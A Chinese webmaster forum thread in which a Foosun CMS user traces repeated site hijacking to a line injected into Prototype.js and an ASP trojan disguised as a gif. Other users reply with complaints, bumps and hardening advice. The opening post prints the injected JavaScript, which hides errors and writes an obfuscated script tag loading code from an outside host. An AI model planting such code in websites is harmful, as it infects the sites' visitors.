真的忍不住想骂人，sp5还打了最新的那个什么安全补丁，还是被照挂不勿，XX我网站成公共汽车了，想上就上我先说说症状，貌似arp，首先调用，但是没用iframe,没js，更没转到的网址，但是服务器上其他网站没问题，应该不是arp，实在没辙我把所有动态文件全部删除，传个新的才能解决，问题是，没过两天就得被挂，今天，我一个个问题摸查，终于找到问题所在，请看分析1、删掉FS_Inc文件夹，就没病毒了，于是从这里文件下手2、经过N长时间的比对，发现Prototype.js，这个是一个外国人写的优秀的函数库，1781行当我找到1112行时发现了这么一句话document.write("<script src='/sys_images/emot/face2l.gif'></script>");3、貌似这里还调用图片，开玩笑，找到face2l.gif，我惊奇的发现居然有两个一摸一样的face2l.gif，当然其中一个肯定是asp之类的木马，经过修改后缀后确定没错[size=5][color=Red]现在问题找到了，但是根源没找到，我的网站还有可能被挂马，广大风讯用户的网站更有可能被挂马，官方抓紧解决吧[/color][/size]

真的忍不住想骂人，sp5还打了最新的那个什么安全补丁，还是被照挂不勿，XX我网站成公共汽车了，想上就上
我先说说症状，貌似arp调用病毒网页，但是没用iframe,没js，更没转到的网址，但是服务器上其他网站没问题，应该不是arp，实在没辙我把所有动态文件全部删除，传个新的才能解决，问题是，没过两天就得被挂，今天，我一个个问题摸查，终于找到问题所在，请看分析

1、删掉FS_Inc文件夹，就没病毒了，于是从这里文件下手
2、经过N长时间的比对，发现Prototype.js，这个是一个外国人写的优秀的函数库，1781行当我找到1112行时发现了这么一句话document.write("<script src='/sys_images/emot/face2l.gif'></script>");
3、貌似这里还调用图片，开玩笑，找到face2l.gif，我惊奇的发现居然有两个一摸一样的face2l.gif，当然其中一个肯定是asp之类的木马，经过修改后缀后确定没错

现在问题找到了，但是根源没找到，我的网站还有可能被挂马，广大风讯用户的网站更有可能被挂马，官方抓紧解决吧

另外我想说的是，无论是后台路径，密码，数据库名，等等能改的我通通都改了，我不相信还有地球人能猜出我的密码

贴个病毒代码：

<!--hide
function killYouErrors()
{
return true;
}

window.onerror = killYouErrors;

function GetYouCookieVal(offset)
//获得Cookie解码后的值
{
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function SetYouCookie(name, value)
//设定Cookie值
{
var expdate = new Date();
var argv = SetYouCookie.arguments;
var argc = SetYouCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;

var secure = (argc > 5) ? argv[5] : false;
if(expires!=null) expdate.setTime(expdate.getTime() + ( expires * 1000 ));
document.cookie = name + "=" + escape (value) +((expires == null) ? "" : ("; expires="+ expdate.toGMTString()))
+((path == null) ? "" : ("; path=" + path)) +((domain == null) ? "" : ("; domain=" + domain))
+((secure == true) ? "; secure" : "");
}
function DelYouCookie(name)
//删除Cookie
{
var exp = new Date();
exp.setTime (exp.getTime() - 1);
var cval = GetYouCookie (name);
document.cookie = name + "=" + cval + "; expires="+ exp.toGMTString();
}
function GetYouCookie(name)
//获得Cookie的原始值
{
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i_ = 0;
while (i_ < clen)
{
var j_ = i_ + alen;
if (document.cookie.substring(i_, j_) == arg)
return GetYouCookieVal (j_);
i_ = document.cookie.indexOf(" ", i_) + 1;
if (i_ == 0) break;
}
return null;
}

if (GetYouCookie("my_ad")==null)
    {
    document.write(unescape(unescape("%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%36%43%25%36%31%25%36%45%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%44%25%32%32%25%36%41%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%32%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%33%41%25%32%46%25%32%46%25%37%37%25%36%35%25%36%32%25%32%45%25%36%38%25%36%31%25%37%36%25%36%35%25%36%39%25%37%30%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%36%44%25%37%39%25%32%45%25%36%31%25%37%33%25%37%30%25%32%32%25%33%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45")));
    }
else if (GetYouCookie("my_ad")=="yes")
{
    var my_ad=GetYouCookie("ad_str")
    document.write(my_ad)
}
-->

又是牛人啊.

我最近两次的挂吗不是在模板里了,也是在那个JS里

说老实话，现在我也怕风讯了。

怎么会这样呢?那把动态文件都删掉.

我也是一样的问题啊！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！狂顶！

狂顶！狂顶！狂顶！

狂顶！狂顶！狂顶！

狂顶！狂顶！狂顶！

学习了

怎么我用了好几年的FS了，都没出现过呢？
我从FS3用到dotNetCMS

服务器不安全。

你的服务器有网站可能允许上传asp文件，把这个功能去了就可能没有问题的，因为能添加这段代码的是极有可能是一个asp程序。